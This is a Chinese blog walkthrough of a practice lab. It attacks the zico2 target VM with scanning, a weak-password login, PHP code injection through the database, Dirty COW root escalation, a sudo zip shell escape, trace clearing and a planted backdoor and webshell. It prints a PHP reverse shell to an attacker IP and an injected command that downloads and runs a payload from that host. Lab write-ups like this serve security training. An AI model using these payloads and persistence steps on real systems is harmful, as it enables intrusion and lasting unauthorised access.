靶机zico2练习:数据库插入反弹语句获取shell,脏牛提权,清除痕迹,留后门

1.主机发现

2.端口扫描

3.目录扫描

4.端口访问

尝试一下,含有文件包含漏洞

5.访问扫描出来的目录

发现登录端口,需要输入密码

尝试弱口令admin登录成功

信息查询,发现用户名、密码

md5解密试试,root用户密码为:34kroot34

zico用户密码为:zico2215@

由于存在ssh服务端口,尝试连接

连接失败!

6.漏洞搜索

查看文件

验证步骤如下:

存在远程PHP代码注入漏洞,尝试在数据库中插入phpinfo()语句,利用文件包含

测试成功

7.获取shell

攻击机上写反弹shell脚本

<?php $sock=fsockopen("192.168.109.159",7777);exec("/bin/sh -i <&3 >&3 2>&3");?>

打开Apache服务

删除之前建立的表a,新建表b,在目标数据库插入代码

<?php system("wget 192.168.109.159/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>

打开监听

访问网页:文件读取

获取shell并转换为交互式

查看权限

8.脏牛提权

下载脏牛文件到靶机/tmp目录下

编译文件并执行

切换用户

至此,提权成功!

9.拓展

看看文件

尝试远程登录成功

使用命令失败

sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'"

命令成功参考: https://blog.csdn.net/qq_42180996/article/details/89578294#8.%E8%8E%B7%E5%BE%97%E5%8F%8D%E5%BC%B9shell

暂时未能找到解决方案,可采用脏牛提权!

通过脏牛提权后,可以编写后门文件

清除痕迹,恢复password文件

菜刀连接,获取webshell权限

连接成功!

©️2020 CSDN 皮肤主题: 精致技术 设计师:CSDN官方博客 返回首页